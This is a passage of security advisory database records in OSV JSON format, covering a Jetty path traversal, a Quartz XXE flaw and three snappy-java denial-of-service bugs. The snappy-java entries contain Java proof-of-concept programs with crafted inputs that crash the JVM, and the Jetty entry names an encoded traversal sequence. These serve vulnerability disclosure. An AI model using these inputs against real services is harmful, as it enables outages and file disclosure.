via a `%2e%2e%5c` (encoded `../`) in the URL. 
NOTE: this might be the same issue as CVE-2005-3747.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "6.0.beta16" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-qmgj-5h75-jr67/GHSA-qmgj-5h75-jr67.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-2758" }, { "type": "PACKAGE", "url": "https://github.com/jetty-project/codehaus-jetty6" }, { "type": "WEB", "url": "https://web.archive.org/web/20200302050157/http://securitytracker.com/id?1016168" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2024-02-12T16:10:17Z", "nvd_published_at": "2006-06-02T01:02:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-9qcf-c26r-x5rf", "published": "2020-07-01T17:55:03Z", "modified": "2024-10-15T23:39:47.179091Z", "aliases": [ "CVE-2019-13990" ], "summary": "XML external entity injection in Terracotta Quartz Scheduler", "details": "initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.", "affected": [ { "package": { "name": "org.quartz-scheduler:quartz", "ecosystem": "Maven", "purl": "pkg:maven/org.quartz-scheduler/quartz" }, "ranges": [ { "type": "ECOSYSTEM", "events": 
[ { "introduced": "0" }, { "fixed": "2.3.2" } ] } ], "versions": [ "1.7.2", "1.7.3", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "2.0.0", "2.0.1", "2.0.2", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.1.6", "2.1.7", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.3.0", "2.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-9qcf-c26r-x5rf/GHSA-9qcf-c26r-x5rf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13990" }, { "type": "WEB", "url": "https://github.com/quartz-scheduler/quartz/issues/467" }, { "type": "WEB", "url": "https://github.com/quartz-scheduler/quartz/pull/501" }, { "type": "WEB", "url": "https://github.com/quartz-scheduler/quartz/commit/13c1d45aa1db15d0fa0e4997139c99ba219be551" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21df13c8bd2c2eae4b9661aae814c4a2a814d1f7875c765b8b115c9a@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3a6884e8d819f32cde8c07b98934de3e80467859880f784950bf44cf%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3a6884e8d819f32cde8c07b98934de3e80467859880f784950bf44cf@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9b56ac1934d7bf16afc83eac1c39c98c1b20b4b15891dce923bf8aa%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9b56ac1934d7bf16afc83eac1c39c98c1b20b4b15891dce923bf8aa@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221028-0002" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGQUARTZSCHEDULER-461170" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", 
"url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21df13c8bd2c2eae4b9661aae814c4a2a814d1f7875c765b8b115c9a%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f74b170d3d58d7a24db1afd3908bb0ab58a3900e16e73275674cdfaf@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f74b170d3d58d7a24db1afd3908bb0ab58a3900e16e73275674cdfaf%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e493e718a50f21201e05e82d42a8796b4046e83f0d286b90e58e0629@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e493e718a50f21201e05e82d42a8796b4046e83f0d286b90e58e0629%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b6e3480b19856365fb5eef03aa0915a4679de4b019a1e975502d949@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b6e3480b19856365fb5eef03aa0915a4679de4b019a1e975502d949%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1870324fea41ea68cff2fd1bf6ee2747432dc1d9d22a22cc681e0ec3@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1870324fea41ea68cff2fd1bf6ee2747432dc1d9d22a22cc681e0ec3%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/172d405e556e2f1204be126bb3eb28c5115af91bcc1651b4e870bb82@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/172d405e556e2f1204be126bb3eb28c5115af91bcc1651b4e870bb82%40%3Cdev.tomee.apache.org%3E" }, { 
"type": "PACKAGE", "url": "https://github.com/quartz-scheduler/quartz" }, { "type": "WEB", "url": "https://confluence.atlassian.com/security/ssot-117-cve-2019-13990-xxe-xml-external-entity-injection-vulnerability-in-jira-service-management-data-center-and-jira-service-management-server-1295385959.html" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-07-01T17:54:54Z", "nvd_published_at": "2019-07-26T19:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-55g7-9cwv-5qfv", "published": "2023-09-25T18:30:18Z", "modified": "2024-02-16T08:07:08.591827Z", "aliases": [ "CVE-2023-43642" ], "related": [ "CGA-82h8-5945-hf9h", "CGA-hp96-wjrq-9f66", "CVE-2023-43642" ], "summary": "snappy-java's missing upper bound check on chunk length can lead to Denial of Service (DoS) impact", "details": "### Summary\n\nsnappy-java is a data compression library in Java. Its SnappyInputStream was found to be vulnerable to Denial of Service (DoS) attacks when decompressing data with a too-large chunk size. Due to missing upper bound check on chunk length, an unrecoverable fatal error can occur. \n\n### Scope\n\nAll versions of snappy-java including the latest released version 1.1.10.3. A fix is applied in 1.1.10.4\n\n### Details\nWhile performing mitigation efforts related to [CVE-2023-34455](https://nvd.nist.gov/vuln/detail/CVE-2023-34455) in Confluent products, our Application Security team closely analyzed the fix that was accepted and merged into snappy-java version 1.1.10.1 in [this](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea) commit. 
The check on [line 421](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR421) only attempts to check if chunkSize is not a negative value. We believe that this is an inadequate fix as it misses an upper-bounds check for overly positive values such as 0x7FFFFFFF (or (2,147,483,647 in decimal) before actually [attempting to allocate](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR429) the provided unverified number of bytes via the “chunkSize” variable. This missing upper-bounds check can lead to the applications depending upon snappy-java to allocate an inappropriate number of bytes on the heap which can then cause an java.lang.OutOfMemoryError exception. Under some specific conditions and contexts, this can lead to a Denial-of-Service (DoS) attack with a direct impact on the availability of the dependent implementations based on the usage of the snappy-java library for compression/decompression needs.\n\n### PoC\nCompile and run the following code:\n```\npackage org.example;\nimport org.xerial.snappy.SnappyInputStream;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};\n SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));\n byte[] out = new byte[50];\n try {\n in.read(out);\n }\n catch (Exception ignored) {\n }\n }\n}\n```\n\n### Impact\nDenial of Service of applications dependent on snappy-java especially if `ExitOnOutOfMemoryError` or `CrashOnOutOfMemoryError` is configured on the JVM.\n\n### Credits\nJan Werner, Mukul Khullar and Bharadwaj Machiraju from Confluent's Application Security team. 
\n\nWe kindly request for a new CVE ID to be assigned once you acknowledge this vulnerability.", "affected": [ { "package": { "name": "org.xerial.snappy:snappy-java", "ecosystem": "Maven", "purl": "pkg:maven/org.xerial.snappy/snappy-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.10.4" } ] } ], "versions": [ "1.0.1-rc1", "1.0.1-rc2", "1.0.1-rc3", "1.0.1-rc4", "1.0.3", "1.0.3-rc1", "1.0.3-rc2", "1.0.3-rc3", "1.0.3-rc4", "1.0.3.1", "1.0.3.2", "1.0.3.3", "1.0.4", "1.0.4.1", "1.0.5", "1.0.5-M1", "1.0.5-M2", "1.0.5-M3", "1.0.5-M4", "1.0.5.1", "1.0.5.2", "1.0.5.3", "1.0.5.4", "1.1.0", "1.1.0-M1", "1.1.0-M2", "1.1.0-M3", "1.1.0-M4", "1.1.0.1", "1.1.1", "1.1.1-M1", "1.1.1-M2", "1.1.1-M3", "1.1.1-M4", "1.1.1.1", "1.1.1.2", "1.1.1.3", "1.1.1.4", "1.1.1.5", "1.1.1.6", "1.1.1.7", "1.1.10.0", "1.1.10.1", "1.1.10.2", "1.1.10.3", "1.1.2", "1.1.2-M1", "1.1.2-RC1", "1.1.2-RC2", "1.1.2-RC3", "1.1.2.1", "1.1.2.2", "1.1.2.3", "1.1.2.4", "1.1.2.5", "1.1.2.6", "1.1.3-M1", "1.1.3-M2", "1.1.4", "1.1.4-M1", "1.1.4-M2", "1.1.4-M3", "1.1.7", "1.1.7.1", "1.1.7.2", "1.1.7.3", "1.1.7.4", "1.1.7.5", "1.1.7.6", "1.1.7.7", "1.1.7.8", "1.1.8", "1.1.8.1", "1.1.8.2", "1.1.8.3", "1.1.8.4", "1.1.9.0", "1.1.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-55g7-9cwv-5qfv/GHSA-55g7-9cwv-5qfv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-55g7-9cwv-5qfv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43642" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/commit/9f8c3cf74223ed0a8a834134be9c917b9f10ceb5" }, { "type": "PACKAGE", "url": "https://github.com/xerial/snappy-java" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/releases/tag/v1.1.10.4" } ], "database_specific": { "cwe_ids": [ 
"CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-09-25T18:30:18Z", "nvd_published_at": "2023-09-25T20:15:11Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fjpj-2g6w-x25r", "published": "2023-06-15T16:28:08Z", "modified": "2024-02-16T08:21:07.894811Z", "aliases": [ "CVE-2023-34454" ], "related": [ "CGA-4248-v6xc-823x" ], "summary": "snappy-java's Integer Overflow vulnerability in compress leads to DoS", "details": "## Summary\nDue to unchecked multiplications, an integer overflow may occur, causing an unrecoverable fatal error.\n## Impact\nDenial of Service\n## Description\nThe function [compress(char[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L169) in the file [Snappy.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/Snappy.java) receives an array of characters and compresses it. It does so by multiplying the length by 2 and passing it to the [rawCompress](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L422) function.\n\n```java\npublic static byte[] compress(char[] input)\n throws IOException\n {\n return rawCompress(input, input.length * 2); // char uses 2 bytes\n }\n\n```\n\nSince the length is not tested, the multiplication by two can cause an integer overflow and become negative. 
The rawCompress function then uses the received length and passes it to the natively compiled maxCompressedLength function, using the returned value to allocate a byte array.\n\n```java\n public static byte[] rawCompress(Object data, int byteSize)\n throws IOException\n {\n byte[] buf = new byte[Snappy.maxCompressedLength(byteSize)];\n int compressedByteSize = impl.rawCompress(data, 0, byteSize, buf, 0);\n byte[] result = new byte[compressedByteSize];\n System.arraycopy(buf, 0, result, 0, compressedByteSize);\n return result;\n }\n\n```\n\nSince the maxCompressedLength function treats the length as an unsigned integer, it doesn’t care that it is negative, and it returns a valid value, which is casted to a signed integer by the Java engine. If the result is negative, a “java.lang.NegativeArraySizeException” exception will be raised while trying to allocate the array “buf”. On the other side, if the result is positive, the “buf” array will successfully be allocated, but its size might be too small to use for the compression, causing a fatal Access Violation error.\nThe same issue exists also when using the “compress” functions that receive double, float, int, long and short, each using a different multiplier that may cause the same issue. 
The issue most likely won’t occur when using a byte array, since creating a byte array of size 0x80000000 (or any other negative value) is impossible in the first place.\n\n\n## Steps To Reproduce\nCompile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.Snappy;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n char[] uncompressed = new char[0x40000000];\n byte[] compressed = Snappy.compress(uncompressed);\n }\n}\n\n```\n\nThe program will crash, creating crashdumps and showing the following error (or similar):\n\n```\n#\n# A fatal error has been detected by the Java Runtime Environment:\n#\n# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x0000000063a01c20, pid=21164, tid=508\n#\n.......\n```\n\n\nAlternatively - compile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.Snappy;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n char[] uncompressed = new char[0x3fffffff];\n byte[] compressed = Snappy.compress(uncompressed);\n }\n}\n```\n\nThe program will crash with the following error (or similar), since the maxCompressedLength returns a value that is interpreted as negative by java:\n\n```\nException in thread \"main\" java.lang.NegativeArraySizeException: -1789569677\n\tat org.xerial.snappy.Snappy.rawCompress(Snappy.java:425)\n\tat org.xerial.snappy.Snappy.compress(Snappy.java:172)\n\tat org.example.Main.main(Main.java:10)\n\n```", "affected": [ { "package": { "name": "org.xerial.snappy:snappy-java", "ecosystem": "Maven", "purl": "pkg:maven/org.xerial.snappy/snappy-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.10.1" } ] } ], "versions": [ "1.0.1-rc1", "1.0.1-rc2", "1.0.1-rc3", "1.0.1-rc4", "1.0.3", "1.0.3-rc1", "1.0.3-rc2", "1.0.3-rc3", "1.0.3-rc4", "1.0.3.1", "1.0.3.2", "1.0.3.3", "1.0.4", "1.0.4.1", "1.0.5", "1.0.5-M1", 
"1.0.5-M2", "1.0.5-M3", "1.0.5-M4", "1.0.5.1", "1.0.5.2", "1.0.5.3", "1.0.5.4", "1.1.0", "1.1.0-M1", "1.1.0-M2", "1.1.0-M3", "1.1.0-M4", "1.1.0.1", "1.1.1", "1.1.1-M1", "1.1.1-M2", "1.1.1-M3", "1.1.1-M4", "1.1.1.1", "1.1.1.2", "1.1.1.3", "1.1.1.4", "1.1.1.5", "1.1.1.6", "1.1.1.7", "1.1.10.0", "1.1.2", "1.1.2-M1", "1.1.2-RC1", "1.1.2-RC2", "1.1.2-RC3", "1.1.2.1", "1.1.2.2", "1.1.2.3", "1.1.2.4", "1.1.2.5", "1.1.2.6", "1.1.3-M1", "1.1.3-M2", "1.1.4", "1.1.4-M1", "1.1.4-M2", "1.1.4-M3", "1.1.7", "1.1.7.1", "1.1.7.2", "1.1.7.3", "1.1.7.4", "1.1.7.5", "1.1.7.6", "1.1.7.7", "1.1.7.8", "1.1.8", "1.1.8.1", "1.1.8.2", "1.1.8.3", "1.1.8.4", "1.1.9.0", "1.1.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.10.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-fjpj-2g6w-x25r/GHSA-fjpj-2g6w-x25r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-fjpj-2g6w-x25r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34454" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/commit/d0042551e4a3509a725038eb9b2ad1f683674d94" }, { "type": "PACKAGE", "url": "https://github.com/xerial/snappy-java" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L169" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L422" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/Snappy.java" } ], "database_specific": { "cwe_ids": [ "CWE-190" ], "github_reviewed": true, "github_reviewed_at": "2023-06-15T16:28:08Z", "nvd_published_at": "2023-06-15T17:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pqr6-cmr2-h8hf", "published": "2023-06-15T16:13:20Z", "modified": "2024-02-16T08:00:57.023897Z", "aliases": [ "CVE-2023-34453" ], "related": [ "CGA-8pqj-995r-975g", "CVE-2023-34453" ], "summary": "snappy-java's Integer Overflow vulnerability in shuffle leads to DoS", "details": "## Summary\nDue to unchecked multiplications, an integer overflow may occur, causing a fatal error.\n## Impact\nDenial of Service\n## Description\nThe function [shuffle(int[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107) in the file [BitShuffle.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java) receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function.\n\n```java\npublic static byte[] shuffle(int[] input) throws IOException {\n byte[] output = new byte[input.length * 4];\n int numProcessed = impl.shuffle(input, 0, 4, input.length * 4, output, 0);\n assert(numProcessed == input.length * 4);\n return output;\n }\n\n```\n\nSince the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a “java.lang.NegativeArraySizeException” exception will raise, which can crash the program. 
In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as “java.lang.ArrayIndexOutOfBoundsException”.\nThe same issue exists also when using the “shuffle” functions that receive a double, float, long and short, each using a different multiplier that may cause the same issue.\n\n## Steps To Reproduce\nCompile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.BitShuffle;\n\nimport java.io.*;\n\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n int[] original = new int[0x40000000];\n byte[] shuffled = BitShuffle.shuffle(original);\n System.out.println(shuffled[0]);\n }\n}\n\n```\nThe program will crash, showing the following error (or similar):\n\n```\nException in thread \"main\" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0\n\tat org.example.Main.main(Main.java:12)\n\nProcess finished with exit code 1\n\n```\n\nAlternatively - compile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.BitShuffle;\n\nimport java.io.*;\n\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n int[] original = new int[0x20000000];\n byte[] shuffled = BitShuffle.shuffle(original);\n }\n}\n\n```\nThe program will crash with the following error (or similar):\n\n```\nException in thread \"main\" java.lang.NegativeArraySizeException: -2147483648\n\tat org.xerial.snappy.BitShuffle.shuffle(BitShuffle.java:108)\n\tat org.example.Main.main(Main.java:11)\n```", "affected": [ { "package": { "name": "org.xerial.snappy:snappy-java", "ecosystem": "Maven", "purl": "pkg:maven/org.xerial.snappy/snappy-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.10.1" } ] } ], "versions": [ "1.0.1-rc1", "1.0.1-rc2", "1.0.1-rc3", "1.0.1-rc4", "1.0.3", "1.0.3-rc1", "1.0.3-rc2", 
"1.0.3-rc3", "1.0.3-rc4", "1.0.3.1", "1.0.3.2", "1.0.3.3", "1.0.4", "1.0.4.1", "1.0.5", "1.0.5-M1", "1.0.5-M2", "1.0.5-M3", "1.0.5-M4", "1.0.5.1", "1.0.5.2", "1.0.5.3", "1.0.5.4", "1.1.0", "1.1.0-M1", "1.1.0-M2", "1.1.0-M3", "1.1.0-M4", "1.1.0.1", "1.1.1", "1.1.1-M1", "1.1.1-M2", "1.1.1-M3", "1.1.1-M4", "1.1.1.1", "1.1.1.2", "1.1.1.3", "1.1.1.4", "1.1.1.5", "1.1.1.6", "1.1.1.7", "1.1.10.0", "1.1.2", "1.1.2-M1", "1.1.2-RC1", "1.1.2-RC2", "1.1.2-RC3", "1.1.2.1", "1.1.2.2", "1.1.2.3", "1.1.2.4", "1.1.2.5", "1.1.2.6", "1.1.3-M1", "1.1.3-M2", "1.1.4", "1.1.4-M1", "1.1.4-M2", "1.1.4-M3", "1.1.7", "1.1.7.1", "1.1.7.2", "1.1.7.3", "1.1.7.4", "1.1.7.5", "1.1.7.6", "1.1.7.7", "1.1.7.8", "1.1.8", "1.1.8.1", "1.1.8.2", "1.1.8.3", "1.1.8.4", "1.1.9.0", "1.1.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.10.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-pqr6-cmr2-h8hf/GHSA-pqr6-cmr2-h8hf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-pqr6-cmr2-h8hf" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34453" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/commit/820e2e074c58748b41dbd547f4edba9e108ad905" }, { "type": "PACKAGE", "url": "https://github.com/xerial/snappy-java" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java" } ], "database_specific": { "cwe_ids": [ "CWE-190" ], "github_reviewed": true, "github_reviewed_at": "2023-06-15T16:13:20Z", "nvd_published_at": "2023-06-15T17:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", 
"id": "GHSA-qcwq-55hx-v3vh", "published": "2023-06-15T17:15:06Z", "modified": "2024-02-17T05:36:43.827976Z", "aliases": [ "CVE-2023-34455" ], "related": [ "CGA-644v-gq8j-xww8", "CVE-2023-34455" ], "summary": "snappy-java's unchecked chunk length leads to DoS", "details": "## Summary\nDue to use of an unchecked chunk length, an unrecoverable fatal error can occur.\n## Impact\nDenial of Service\n## Description\nThe code in the function [hasNextChunk](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/SnappyInputStream.java#L388) in the file [SnappyInputStream.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/SnappyInputStream.java) checks if a given stream has more chunks to read. It does that by attempting to read 4 bytes. If it wasn’t possible to read the 4 bytes, the function returns false. Otherwise, if 4 bytes were available, the code treats them as the length of the next chunk.\n\n\n\n```java\n int readBytes = readNext(header, 0, 4);\n if (readBytes \u003c 4) {\n return false;\n }\n\n int chunkSize = SnappyOutputStream.readInt(header, 0);\n if (chunkSize == SnappyCodec.MAGIC_HEADER_HEAD) {\n .........\n }\n\n // extend the compressed data buffer size\n if (compressed == null || chunkSize \u003e compressed.length) {\n compressed = new byte[chunkSize];\n }\n\n```\n\nIn the case that the “compressed” variable is null, a byte array is allocated with the size given by the input data. Since the code doesn’t test the legality of the “chunkSize” variable, it is possible to pass a negative number (such as 0xFFFFFFFF which is -1), which will cause the code to raise a “java.lang.NegativeArraySizeException” exception. 
A worse case would happen when passing a huge positive value (such as 0x7FFFFFFF), which would raise the fatal “java.lang.OutOfMemoryError” error.\n\n\n## Steps To Reproduce\nCompile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.SnappyInputStream;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};\n SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));\n byte[] out = new byte[50];\n try {\n in.read(out);\n }\n catch (Exception ignored) {\n\n }\n }\n}\n```\n\nThe program will crash with the following error (or similar), even though there is a catch clause, since “OutOfMemoryError” does not get caught by catching the “Exception” class:\n\n```\nException in thread \"main\" java.lang.OutOfMemoryError: Requested array size exceeds VM limit\n\tat org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422)\n\tat org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167)\n\tat java.base/java.io.InputStream.read(InputStream.java:217)\n\tat org.example.Main.main(Main.java:12)\n\n```\n\n\nAlternatively - compile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.SnappyInputStream;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff};\n SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));\n byte[] out = new byte[50];\n in.read(out);\n }\n}\n```\n\nThe program will crash with the following error (or similar):\n\n```\nException in thread \"main\" java.lang.NegativeArraySizeException: -1\n\tat 
org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422)\n\tat org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167)\n\tat java.base/java.io.InputStream.read(InputStream.java:217)\n\tat org.example.Main.main(Main.java:12)\n\n```\n\n\nIt is important to note that these examples were written by using a flow that is generally used by developers, and can be seen for example in the Apache project “flume”: https://github.com/apache/flume/blob/f9dbb2de255d59e35e3668a5c6c66a268a055207/flume-ng-channels/flume-file-channel/src/main/java/org/apache/flume/channel/file/Serialization.java#L278. Since they used try-catch, the “NegativeArraySizeException” exception won’t harm their users, but the “OutOfMemoryError” error can.", "affected": [ { "package": { "name": "org.xerial.snappy:snappy-java", "ecosystem": "Maven", "purl": "pkg:maven/org.xerial.snappy/snappy-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.10.1" } ] } ], "versions": [ "1.0.1-rc1", "1.0.1-rc2", "1.0.1-rc3", "1.0.1-rc4", "1.0.3", "1.0.3-rc1", "1.0.3-rc2", "1.0.3-rc3", "1.0.3-rc4", "1.0.3.1", "1.0.3.2", "1.0.3.3", "1.0.4", "1.0.4.1", "1.0.5", "1.0.5-M1", "1.0.5-M2", "1.0.5-M3", "1.0.5-M4", "1.0.5.1", "1.0.5.2", "1.0.5.3", "1.0.5.4", "1.1.0", "1.1.0-M1", "1.1.0-M2", "1.1.0-M3", "1.1.0-M4", "1.1.0.1", "1.1.1", 